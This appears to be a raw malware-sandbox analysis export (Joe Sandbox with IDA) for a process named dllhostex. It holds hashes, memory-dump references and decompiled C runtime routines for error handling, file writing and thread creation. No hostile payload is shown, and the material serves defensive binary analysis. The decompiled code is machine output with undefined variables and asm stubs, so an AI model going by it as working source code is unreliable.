                                                • Source File: 00000010.00000002.968853301.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
                                                • Associated: 00000010.00000002.968837969.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969220651.00000000013CE000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969243835.00000000013D3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969258828.00000000013D6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1290000_dllhostex.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: api-ms-$ext-ms-
                                                • API String ID: 0-537541572
                                                • Opcode ID: 3329a7f1965926b8e1005082e71ada5e7cd7babd20a57bc9b2dbd793d5dce337
                                                • Instruction ID: e70ec12ed09fbf73162ef300d05ee0f3a637bb1429feea395a74597acfb06e4b
                                                • Opcode Fuzzy Hash: 3329a7f1965926b8e1005082e71ada5e7cd7babd20a57bc9b2dbd793d5dce337
                                                • Instruction Fuzzy Hash: 0E212BB2A01225EBDB329A299C92E5E7B6CDF417E8F944120FD05AF389D730EC0487D0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01365D22 Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE
                                                Download Yara Rule

                                                Control-flow Graph

                                                C-Code - Quality: 78%
                                                			E01365D22(void* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				intOrPtr _t5;
				void* _t6;
				intOrPtr _t9;
				void* _t10;
				void* _t30;
				void* _t39;
				void* _t40;
				void* _t43;
				void* _t45;
				void* _t49;
				long _t51;
				long _t52;
				void* _t55;
				void* _t57;
				void* _t60;

				_t49 = __edx;
				_t43 = __ecx;
				_push(_t55);
				_t51 = GetLastError();
				_t2 =  *0x13cc370; // 0x6
				_t62 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L5:
					_t3 = E013672FE(_t43, __eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t30 = E01366CCA(_t43, 1, 0x364); // executed
						_t55 = _t30;
						_pop(_t43);
						__eflags = _t55;
						if(__eflags != 0) {
							__eflags = E013672FE(_t43, __eflags,  *0x13cc370, _t55);
							if(__eflags != 0) {
								E01365B4C(_t55, _t55, 0x13d5274);
								E013656E2(0);
								_t60 = _t60 + 0xc;
								_t39 = _t55;
							} else {
								_t39 = 0;
								E013672FE(_t43, __eflags,  *0x13cc370, 0);
								_push(_t55);
								goto L8;
							}
						} else {
							_t39 = 0;
							__eflags = 0;
							E013672FE(_t43, 0,  *0x13cc370, 0);
							_push(0);
							L8:
							E013656E2();
							_pop(_t43);
						}
					}
				} else {
					_t39 = E013672A8(_t43, _t62, _t2);
					if(_t39 == 0) {
						_t2 =  *0x13cc370; // 0x6
						goto L5;
					} else {
						if(_t39 == 0xffffffff) {
							L3:
							_t39 = 0;
						}
					}
				}
				SetLastError(_t51);
				if(_t39 == 0) {
					E0135EBB9(_t39, _t43, _t49, _t51, _t55);
					asm("int3");
					_t5 =  *0x13cc370; // 0x6
					_push(_t55);
					__eflags = _t5 - 0xffffffff;
					if(__eflags == 0) {
						L20:
						_t6 = E013672FE(_t43, __eflags, _t5, 0xffffffff);
						__eflags = _t6;
						if(_t6 == 0) {
							goto L29;
						} else {
							_t55 = E01366CCA(_t43, 1, 0x364);
							_pop(_t43);
							__eflags = _t55;
							if(__eflags != 0) {
								__eflags = E013672FE(_t43, __eflags,  *0x13cc370, _t55);
								if(__eflags != 0) {
									E01365B4C(_t55, _t55, 0x13d5274);
									E013656E2(0);
									_t60 = _t60 + 0xc;
									goto L27;
								} else {
									E013672FE(_t43, __eflags,  *0x13cc370, _t21);
									_push(_t55);
									goto L23;
								}
							} else {
								E013672FE(_t43, __eflags,  *0x13cc370, _t20);
								_push(_t55);
								L23:
								E013656E2();
								_pop(_t43);
								goto L29;
							}
						}
					} else {
						_t55 = E013672A8(_t43, __eflags, _t5);
						__eflags = _t55;
						if(__eflags == 0) {
							_t5 =  *0x13cc370; // 0x6
							goto L20;
						} else {
							__eflags = _t55 - 0xffffffff;
							if(_t55 == 0xffffffff) {
								L29:
								E0135EBB9(_t39, _t43, _t49, _t51, _t55);
								asm("int3");
								_push(_t39);
								_push(_t55);
								_push(_t51);
								_t52 = GetLastError();
								_t9 =  *0x13cc370; // 0x6
								__eflags = _t9 - 0xffffffff;
								if(__eflags == 0) {
									L35:
									_t10 = E013672FE(_t43, __eflags, _t9, 0xffffffff);
									__eflags = _t10;
									if(_t10 == 0) {
										goto L33;
									} else {
										_t57 = E01366CCA(_t43, 1, 0x364);
										_pop(_t45);
										__eflags = _t57;
										if(__eflags != 0) {
											__eflags = E013672FE(_t45, __eflags,  *0x13cc370, _t57);
											if(__eflags != 0) {
												E01365B4C(_t57, _t57, 0x13d5274);
												E013656E2(0);
												_t40 = _t57;
											} else {
												_t40 = 0;
												E013672FE(_t45, __eflags,  *0x13cc370, 0);
												_push(_t57);
												goto L38;
											}
										} else {
											_t40 = 0;
											__eflags = 0;
											E013672FE(_t45, 0,  *0x13cc370, 0);
											_push(0);
											L38:
											E013656E2();
										}
									}
								} else {
									_t40 = E013672A8(_t43, __eflags, _t9);
									__eflags = _t40;
									if(__eflags == 0) {
										_t9 =  *0x13cc370; // 0x6
										goto L35;
									} else {
										__eflags = _t40 - 0xffffffff;
										if(_t40 == 0xffffffff) {
											L33:
											_t40 = 0;
										}
									}
								}
								SetLastError(_t52);
								return _t40;
							} else {
								L27:
								__eflags = _t55;
								if(_t55 == 0) {
									goto L29;
								} else {
									return _t55;
								}
							}
						}
					}
				} else {
					return _t39;
				}
			}























                                                0x01365d22
                                                0x01365d22
                                                0x01365d25
                                                0x01365d2d
                                                0x01365d2f
                                                0x01365d34
                                                0x01365d37
                                                0x01365d53
                                                0x01365d56
                                                0x01365d5b
                                                0x01365d5d
                                                0x00000000
                                                0x01365d5f
                                                0x01365d66
                                                0x01365d6b
                                                0x01365d6e
                                                0x01365d6f
                                                0x01365d71
                                                0x01365d96
                                                0x01365d98
                                                0x01365db1
                                                0x01365db8
                                                0x01365dbd
                                                0x01365dc0
                                                0x01365d9a
                                                0x01365d9a
                                                0x01365da3
                                                0x01365da8
                                                0x00000000
                                                0x01365da8
                                                0x01365d73
                                                0x01365d73
                                                0x01365d73
                                                0x01365d7c
                                                0x01365d81
                                                0x01365d82
                                                0x01365d82
                                                0x01365d87
                                                0x01365d87
                                                0x01365d71
                                                0x01365d39
                                                0x01365d3f
                                                0x01365d43
                                                0x01365d4e
                                                0x00000000
                                                0x01365d45
                                                0x01365d48
                                                0x01365d4a
                                                0x01365d4a
                                                0x01365d4a
                                                0x01365d48
                                                0x01365d43
                                                0x01365dc3
                                                0x01365dcb
                                                0x01365dd3
                                                0x01365dd8
                                                0x01365dd9
                                                0x01365dde
                                                0x01365ddf
                                                0x01365de2
                                                0x01365dfc
                                                0x01365dff
                                                0x01365e04
                                                0x01365e06
                                                0x00000000
                                                0x01365e08
                                                0x01365e14
                                                0x01365e17
                                                0x01365e18
                                                0x01365e1a
                                                0x01365e3d
                                                0x01365e3f
                                                0x01365e56
                                                0x01365e5d
                                                0x01365e62
                                                0x00000000
                                                0x01365e41
                                                0x01365e48
                                                0x01365e4d
                                                0x00000000
                                                0x01365e4d
                                                0x01365e1c
                                                0x01365e23
                                                0x01365e28
                                                0x01365e29
                                                0x01365e29
                                                0x01365e2e
                                                0x00000000
                                                0x01365e2e
                                                0x01365e1a
                                                0x01365de4
                                                0x01365dea
                                                0x01365dec
                                                0x01365dee
                                                0x01365df7
                                                0x00000000
                                                0x01365df0
                                                0x01365df0
                                                0x01365df3
                                                0x01365e6d
                                                0x01365e6d
                                                0x01365e72
                                                0x01365e75
                                                0x01365e76
                                                0x01365e77
                                                0x01365e7e
                                                0x01365e80
                                                0x01365e85
                                                0x01365e88
                                                0x01365ea4
                                                0x01365ea7
                                                0x01365eac
                                                0x01365eae
                                                0x00000000
                                                0x01365eb0
                                                0x01365ebc
                                                0x01365ebf
                                                0x01365ec0
                                                0x01365ec2
                                                0x01365ee7
                                                0x01365ee9
                                                0x01365f02
                                                0x01365f09
                                                0x01365f11
                                                0x01365eeb
                                                0x01365eeb
                                                0x01365ef4
                                                0x01365ef9
                                                0x00000000
                                                0x01365ef9
                                                0x01365ec4
                                                0x01365ec4
                                                0x01365ec4
                                                0x01365ecd
                                                0x01365ed2
                                                0x01365ed3
                                                0x01365ed3
                                                0x01365ed8
                                                0x01365ec2
                                                0x01365e8a
                                                0x01365e90
                                                0x01365e92
                                                0x01365e94
                                                0x01365e9f
                                                0x00000000
                                                0x01365e96
                                                0x01365e96
                                                0x01365e99
                                                0x01365e9b
                                                0x01365e9b
                                                0x01365e9b
                                                0x01365e99
                                                0x01365e94
                                                0x01365f14
                                                0x01365f1f
                                                0x01365df5
                                                0x01365e65
                                                0x01365e65
                                                0x01365e67
                                                0x00000000
                                                0x01365e69
                                                0x01365e6c
                                                0x01365e6c
                                                0x01365e67
                                                0x01365df3
                                                0x01365dee
                                                0x01365dcd
                                                0x01365dd2
                                                0x01365dd2

                                                APIs
                                                • GetLastError.KERNEL32(?,?,?,01360DC2,013C8258,00000010), ref: 01365D27
                                                • _free.LIBCMT ref: 01365D82
                                                • _free.LIBCMT ref: 01365DB8
                                                • SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,01360DC2,013C8258,00000010), ref: 01365DC3
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.968853301.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
                                                • Associated: 00000010.00000002.968837969.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969220651.00000000013CE000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969243835.00000000013D3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969258828.00000000013D6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1290000_dllhostex.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLast_free
                                                • String ID:
                                                • API String ID: 2283115069-0
                                                • Opcode ID: 3d5e6344d5482c2de29cea2a1298efe7dd393ac63002a0dcaa2d3af978f01760
                                                • Instruction ID: d3d4c268cf4c4e67e4c8720d6a4bfe827b5c63cb699a7b519092acc2b7bbd9a2
                                                • Opcode Fuzzy Hash: 3d5e6344d5482c2de29cea2a1298efe7dd393ac63002a0dcaa2d3af978f01760
                                                • Instruction Fuzzy Hash: DF11C4316442077FE6222ABDACC8E2B365DEB627FCB60D235F614961DCDA588D074760
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01360729 Relevance: 4.7, APIs: 3, Instructions: 193COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 97 1360729-136074d 98 1360756-1360758 97->98 99 136074f-1360751 97->99 101 136077a-136079d 98->101 102 136075a-1360775 call 135eb49 call 135eb5c call 135b7a1 98->102 100 136092c-136093a call 1353717 99->100 104 13607a4-13607aa 101->104 105 136079f-13607a2 101->105 102->100 108 13607c9-13607ce 104->108 109 13607ac-13607c4 call 135eb49 call 135eb5c call 135b7a1 104->109 105->104 105->108 111 13607d0-13607dc call 135f4b6 108->111 112 13607df-13607f0 call 13602cf 108->112 143 1360922-1360925 109->143 111->112 125 13607f2-13607f4 112->125 126 1360831-1360843 112->126 130 13607f6-13607fe 125->130 131 136081b-1360827 call 1360096 125->131 128 1360845-136084e 126->128 129 136088a-13608ac WriteFile 126->129 136 1360850-1360853 128->136 137 136087a-1360883 call 1360345 128->137 132 13608b7 129->132 133 13608ae-13608b4 GetLastError 129->133 138 1360804-1360811 call 1360265 130->138 139 13608c0-13608c3 130->139 141 136082c-136082f 131->141 142 13608ba-13608bf 132->142 133->132 145 1360855-1360858 136->145 146 136086a-1360878 call 136050d 136->146 149 1360888 137->149 150 1360814-1360816 138->150 144 13608c6-13608cb 139->144 141->150 142->139 154 136092a-136092b 143->154 151 1360927 144->151 152 13608cd-13608d2 144->152 145->144 153 136085a-1360868 call 1360422 145->153 146->141 149->141 150->142 151->154 156 13608d4-13608d9 152->156 157 13608f8-1360904 152->157 153->141 154->100 162 13608ef-13608f6 call 135eb26 156->162 163 13608db-13608ed call 135eb5c call 135eb49 156->163 160 1360906-1360909 157->160 161 136090f-136091f call 135eb5c call 135eb49 157->161 160->161 166 136090b-136090d 160->166 161->143 162->143 163->143 166->154
                                                C-Code - Quality: 86%
                                                			E01360729(void* __ebx, void* __edi, signed int _a4, signed int _a8, signed int _a12) {
				signed int _v8;
				void* _v12;
				signed int _v16;
				signed int _v20;
				long _v24;
				intOrPtr _v28;
				signed int _v32;
				signed int _v36;
				long _v44;
				char _v48;
				void* __esi;
				signed int _t60;
				signed int _t62;
				signed char _t66;
				signed int _t68;
				intOrPtr _t69;
				signed int _t72;
				signed int _t73;
				signed int _t76;
				intOrPtr _t77;
				signed int _t85;
				signed int _t87;
				signed int _t88;
				signed int _t103;
				void* _t104;
				signed int _t107;
				signed int _t109;
				signed int _t115;
				intOrPtr _t116;
				signed int _t117;
				signed int _t119;
				signed int _t124;
				signed int _t125;
				void* _t126;

				_t60 =  *0x13cc074; // 0x4132269f
				_v8 = _t60 ^ _t125;
				_t107 = _a12;
				_t62 = _a8;
				_v12 = _t62;
				_v24 = _t107;
				_t124 = _a4;
				if(_t107 != 0) {
					__eflags = _t62;
					if(_t62 != 0) {
						_push(__ebx);
						_t115 = _t124 >> 6;
						_push(__edi);
						_t119 = (_t124 & 0x0000003f) * 0x30;
						_v16 = _t115;
						_t116 =  *((intOrPtr*)(0x13d5278 + _t115 * 4));
						_v20 = _t119;
						_t103 =  *((intOrPtr*)(_t116 + _t119 + 0x29));
						__eflags = _t103 - 2;
						if(_t103 == 2) {
							L6:
							_t66 =  !_t107;
							__eflags = _t66 & 0x00000001;
							if((_t66 & 0x00000001) != 0) {
								L8:
								__eflags =  *(_t116 + _t119 + 0x28) & 0x00000020;
								if(__eflags != 0) {
									E0135F4B6(_t124, 0, 0, 2);
									_t126 = _t126 + 0x10;
								}
								asm("stosd");
								asm("stosd");
								asm("stosd");
								_t68 = E013602CF(_t116, __eflags, _t124);
								__eflags = _t68;
								if(_t68 == 0) {
									_t109 = _v16;
									_t117 = _v20;
									_t69 =  *((intOrPtr*)(0x13d5278 + _t109 * 4));
									__eflags =  *((char*)(_t69 + _t117 + 0x28));
									if( *((char*)(_t69 + _t117 + 0x28)) >= 0) {
										_t104 = _v12;
										asm("stosd");
										asm("stosd");
										asm("stosd");
										_t72 = WriteFile( *(_t69 + _t117 + 0x18), _t104, _v24,  &_v44, 0);
										__eflags = _t72;
										if(_t72 == 0) {
											_v48 = GetLastError();
										}
										_t124 =  &_v48;
										goto L27;
									}
									_t104 = _v12;
									_t85 = _t103;
									__eflags = _t85;
									if(_t85 == 0) {
										_t87 = E01360345(_t104,  &_v36,  &_v48, _t124, _t104, _v24); // executed
										goto L16;
									}
									_t88 = _t85 - 1;
									__eflags = _t88;
									if(_t88 == 0) {
										_t87 = E0136050D(_t104,  &_v36,  &_v48, _t124, _t104, _v24);
										goto L16;
									}
									__eflags = _t88 != 1;
									if(_t88 != 1) {
										goto L29;
									}
									_t87 = E01360422(_t104,  &_v36,  &_v48, _t124, _t104, _v24);
									goto L16;
								} else {
									__eflags = _t103;
									if(_t103 == 0) {
										_t104 = _v12;
										_t87 = E01360096(_t104,  &_v36,  &_v48, _t124, _t104, _v24);
										L16:
										L14:
										_t124 = _t87;
										L27:
										asm("movsd");
										asm("movsd");
										asm("movsd");
										L28:
										_t109 = _v16;
										_t117 = _v20;
										L29:
										_t73 = _v32;
										__eflags = _t73;
										if(_t73 != 0) {
											__eflags = _t73 - _v28;
											L40:
											L41:
											return E01353717(_v8 ^ _t125, _t124);
										}
										_t76 = _v36;
										__eflags = _t76;
										if(_t76 == 0) {
											_t77 =  *((intOrPtr*)(0x13d5278 + _t109 * 4));
											__eflags =  *(_t77 + _t117 + 0x28) & 0x00000040;
											if(( *(_t77 + _t117 + 0x28) & 0x00000040) == 0) {
												L37:
												 *((intOrPtr*)(E0135EB5C())) = 0x1c;
												_t79 = E0135EB49();
												 *_t79 =  *_t79 & 0x00000000;
												__eflags =  *_t79;
												L38:
												goto L40;
											}
											__eflags =  *_t104 - 0x1a;
											if( *_t104 != 0x1a) {
												goto L37;
											}
											goto L40;
										}
										_t124 = 5;
										__eflags = _t76 - _t124;
										if(_t76 != _t124) {
											_t79 = E0135EB26(_t76);
										} else {
											 *((intOrPtr*)(E0135EB5C())) = 9;
											 *(E0135EB49()) = _t124;
										}
										goto L38;
									}
									__eflags = _t103 - 1 - 1;
									_t104 = _v12;
									if(_t103 - 1 > 1) {
										goto L28;
									}
									_t87 = E01360265( &_v48, _t104, _v24);
									goto L14;
								}
							}
							 *(E0135EB49()) =  *_t95 & 0x00000000;
							 *((intOrPtr*)(E0135EB5C())) = 0x16;
							_t79 = E0135B7A1();
							goto L38;
						}
						__eflags = _t103 - 1;
						if(_t103 != 1) {
							goto L8;
						}
						goto L6;
					}
					 *(E0135EB49()) =  *_t97 & 0x00000000;
					 *((intOrPtr*)(E0135EB5C())) = 0x16;
					E0135B7A1();
					goto L41;
				}
				goto L41;
			}





































                                                0x01360731
                                                0x01360738
                                                0x0136073b
                                                0x0136073e
                                                0x01360741
                                                0x01360744
                                                0x01360748
                                                0x0136074d
                                                0x01360756
                                                0x01360758
                                                0x0136077a
                                                0x0136077f
                                                0x01360785
                                                0x01360786
                                                0x01360789
                                                0x0136078c
                                                0x01360793
                                                0x01360796
                                                0x0136079a
                                                0x0136079d
                                                0x013607a4
                                                0x013607a6
                                                0x013607a8
                                                0x013607aa
                                                0x013607c9
                                                0x013607c9
                                                0x013607ce
                                                0x013607d7
                                                0x013607dc
                                                0x013607dc
                                                0x013607e4
                                                0x013607e6
                                                0x013607e7
                                                0x013607e8
                                                0x013607ee
                                                0x013607f0
                                                0x01360831
                                                0x01360834
                                                0x01360837
                                                0x0136083e
                                                0x01360843
                                                0x01360891
                                                0x01360896
                                                0x01360899
                                                0x0136089a
                                                0x013608a4
                                                0x013608aa
                                                0x013608ac
                                                0x013608b4
                                                0x013608b4
                                                0x013608b7
                                                0x00000000
                                                0x013608b7
                                                0x01360848
                                                0x0136084b
                                                0x0136084b
                                                0x0136084e
                                                0x01360883
                                                0x00000000
                                                0x01360883
                                                0x01360850
                                                0x01360850
                                                0x01360853
                                                0x01360873
                                                0x00000000
                                                0x01360873
                                                0x01360855
                                                0x01360858
                                                0x00000000
                                                0x00000000
                                                0x01360863
                                                0x00000000
                                                0x013607f2
                                                0x013607f2
                                                0x013607f4
                                                0x0136081e
                                                0x01360827
                                                0x0136082c
                                                0x01360814
                                                0x01360814
                                                0x013608ba
                                                0x013608bd
                                                0x013608be
                                                0x013608bf
                                                0x013608c0
                                                0x013608c0
                                                0x013608c3
                                                0x013608c6
                                                0x013608c6
                                                0x013608c9
                                                0x013608cb
                                                0x01360927
                                                0x0136092a
                                                0x0136092c
                                                0x0136093a
                                                0x0136093a
                                                0x013608cd
                                                0x013608d0
                                                0x013608d2
                                                0x013608f8
                                                0x013608ff
                                                0x01360904
                                                0x0136090f
                                                0x01360914
                                                0x0136091a
                                                0x0136091f
                                                0x0136091f
                                                0x01360922
                                                0x00000000
                                                0x01360922
                                                0x01360906
                                                0x01360909
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0136090b
                                                0x013608d6
                                                0x013608d7
                                                0x013608d9
                                                0x013608f0
                                                0x013608db
                                                0x013608e0
                                                0x013608eb
                                                0x013608eb
                                                0x00000000
                                                0x013608d9
                                                0x013607f8
                                                0x013607fb
                                                0x013607fe
                                                0x00000000
                                                0x00000000
                                                0x0136080c
                                                0x00000000
                                                0x01360811
                                                0x013607f0
                                                0x013607b1
                                                0x013607b9
                                                0x013607bf
                                                0x00000000
                                                0x013607bf
                                                0x0136079f
                                                0x013607a2
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x013607a2
                                                0x0136075f
                                                0x01360767
                                                0x0136076d
                                                0x00000000
                                                0x01360772
                                                0x00000000

                                                Memory Dump Source
                                                • Source File: 00000010.00000002.968853301.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
                                                • Associated: 00000010.00000002.968837969.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969220651.00000000013CE000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969243835.00000000013D3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969258828.00000000013D6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1290000_dllhostex.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 02292f04857c2b85aa796aee7dde22092236649f672096e7fe8ef02e95934506
                                                • Instruction ID: a16b1edfa726961606552d275dd78cef44da0e659b6c413a8cbdefcfeb09454b
                                                • Opcode Fuzzy Hash: 02292f04857c2b85aa796aee7dde22092236649f672096e7fe8ef02e95934506
                                                • Instruction Fuzzy Hash: 3861A171E0410AAFEF59DBBCC842BEEBBBDEF1931CF008065F915A7159D67499008BA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01360EFB Relevance: 4.6, APIs: 3, Instructions: 51threadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 176 1360efb-1360f06 177 1360f1c-1360f2f call 1360ea9 176->177 178 1360f08-1360f1a call 135eb5c call 135b7a1 176->178 184 1360f31-1360f4e CreateThread 177->184 185 1360f5d 177->185 192 1360f6a-1360f6d 178->192 187 1360f50-1360f5c GetLastError call 135eb26 184->187 188 1360f6e-1360f73 184->188 189 1360f5f-1360f69 call 1360e1b 185->189 187->185 190 1360f75-1360f78 188->190 191 1360f7a-1360f7e 188->191 189->192 190->191 191->189
                                                C-Code - Quality: 91%
                                                			E01360EFB(void* __ecx, struct _SECURITY_ATTRIBUTES* _a4, long _a8, intOrPtr _a12, intOrPtr _a16, long _a20, void* _a24) {
				signed int _v8;
				long _v12;
				void* _t14;
				void* _t17;
				void* _t29;
				void* _t32;

				_push(__ecx);
				_push(__ecx);
				if(_a12 != 0) {
					_t14 = E01360EA9(__ecx, __eflags, _a12, _a16);
					_v8 = _t14;
					__eflags = _t14;
					if(_t14 == 0) {
						L5:
						_t32 = 0;
						__eflags = 0;
						L6:
						E01360E1B( &_v8);
						return _t32;
					}
					_t17 = CreateThread(_a4, _a8, E01360D9D, _t14, _a20,  &_v12); // executed
					_t32 = _t17;
					__eflags = _t32;
					if(_t32 != 0) {
						_t29 = _a24;
						__eflags = _t29;
						if(_t29 != 0) {
							 *_t29 = _v12;
						}
						_v8 = _v8 & 0x00000000;
						goto L6;
					}
					E0135EB26(GetLastError());
					goto L5;
				}
				 *((intOrPtr*)(E0135EB5C())) = 0x16;
				E0135B7A1();
				return 0;
			}









                                                0x01360f00
                                                0x01360f01
                                                0x01360f06
                                                0x01360f23
                                                0x01360f28
                                                0x01360f2d
                                                0x01360f2f
                                                0x01360f5d
                                                0x01360f5d
                                                0x01360f5d
                                                0x01360f5f
                                                0x01360f62
                                                0x00000000
                                                0x01360f69
                                                0x01360f44
                                                0x01360f4a
                                                0x01360f4c
                                                0x01360f4e
                                                0x01360f6e
                                                0x01360f71
                                                0x01360f73
                                                0x01360f78
                                                0x01360f78
                                                0x01360f7a
                                                0x00000000
                                                0x01360f7a
                                                0x01360f57
                                                0x00000000
                                                0x01360f5c
                                                0x01360f0d
                                                0x01360f13
                                                0x00000000

                                                APIs
                                                • CreateThread.KERNELBASE(00000000,00000000,Function_000D0D9D,00000000,00000000,00000000), ref: 01360F44
                                                • GetLastError.KERNEL32(?,?,00000000,013521FC,00000000,?), ref: 01360F50
                                                • __dosmaperr.LIBCMT ref: 01360F57
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.968853301.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
                                                • Associated: 00000010.00000002.968837969.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969220651.00000000013CE000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969243835.00000000013D3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969258828.00000000013D6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1290000_dllhostex.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateErrorLastThread__dosmaperr
                                                • String ID:
                                                • API String ID: 2744730728-0
                                                • Opcode ID: a4b8614e8a87ceec3af3f9f9c83d5fe6045c7b89dba6e7e1ec8265a221e649d7
                                                • Instruction ID: e5d4dbc25854aa25a7a1d179eac30f113a8a861141f2f438d54ae95106860d1b
                                                • Opcode Fuzzy Hash: a4b8614e8a87ceec3af3f9f9c83d5fe6045c7b89dba6e7e1ec8265a221e649d7
                                                • Instruction Fuzzy Hash: 6E01B53251421AEFDF299FE4DC06EAE7BACEF14319F008069FC0596154DB719914DBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01360345 Relevance: 3.1, APIs: 2, Instructions: 81fileCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 197 1360345-136039a call 1354780 200 136040f-1360421 call 1353717 197->200 201 136039c 197->201 203 13603a2 201->203 205 13603a8-13603aa 203->205 206 13603c4-13603e9 WriteFile 205->206 207 13603ac-13603b1 205->207 208 1360407-136040d GetLastError 206->208 209 13603eb-13603f6 206->209 210 13603b3-13603b9 207->210 211 13603ba-13603c2 207->211 208->200 209->200 212 13603f8-1360403 209->212 210->211 211->205 211->206 212->203 213 1360405 212->213 213->200
                                                C-Code - Quality: 73%
                                                			E01360345(void* __ebx, void* __edi, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, intOrPtr _a16) {
				signed int _v8;
				char _v9;
				void _v5128;
				long _v5132;
				intOrPtr _v5136;
				void* __esi;
				signed int _t28;
				int _t40;
				long _t42;
				char _t43;
				intOrPtr* _t46;
				intOrPtr* _t51;
				intOrPtr _t55;
				void* _t59;
				void* _t61;
				char* _t62;
				long _t63;
				signed int _t64;

				E01354780();
				_t28 =  *0x13cc074; // 0x4132269f
				_v8 = _t28 ^ _t64;
				_t48 = _a8;
				_t46 = _a4;
				_t51 = _a12;
				_t55 = _a16 + _t51;
				_v5132 =  *((intOrPtr*)( *((intOrPtr*)(0x13d5278 + (_a8 >> 6) * 4)) + 0x18 + (_t48 & 0x0000003f) * 0x30));
				asm("stosd");
				_v5136 = _t55;
				asm("stosd");
				asm("stosd");
				if(_t51 < _t55) {
					_t59 = _v5132;
					do {
						_t62 =  &_v5128;
						while(_t51 < _t55) {
							_t43 =  *_t51;
							_t51 = _t51 + 1;
							if(_t43 == 0xa) {
								 *((intOrPtr*)(_t46 + 8)) =  *((intOrPtr*)(_t46 + 8)) + 1;
								 *_t62 = 0xd;
								_t62 = _t62 + 1;
							}
							 *_t62 = _t43;
							_t62 = _t62 + 1;
							if(_t62 <  &_v9) {
								continue;
							}
							break;
						}
						_a12 = _t51;
						_t63 = _t62 -  &_v5128;
						_t40 = WriteFile(_t59,  &_v5128, _t63,  &_v5132, 0); // executed
						if(_t40 == 0) {
							 *_t46 = GetLastError();
						} else {
							_t42 = _v5132;
							 *((intOrPtr*)(_t46 + 4)) =  *((intOrPtr*)(_t46 + 4)) + _t42;
							if(_t42 >= _t63) {
								goto L9;
							}
						}
						goto L12;
						L9:
						_t51 = _a12;
						_t55 = _v5136;
					} while (_t51 < _t55);
				}
				L12:
				_pop(_t61);
				return E01353717(_v8 ^ _t64, _t61);
			}





















                                                0x0136034f
                                                0x01360354
                                                0x0136035b
                                                0x0136035e
                                                0x01360370
                                                0x01360382
                                                0x01360385
                                                0x01360387
                                                0x0136038f
                                                0x01360390
                                                0x01360396
                                                0x01360397
                                                0x0136039a
                                                0x0136039c
                                                0x013603a2
                                                0x013603a2
                                                0x013603a8
                                                0x013603ac
                                                0x013603ae
                                                0x013603b1
                                                0x013603b3
                                                0x013603b6
                                                0x013603b9
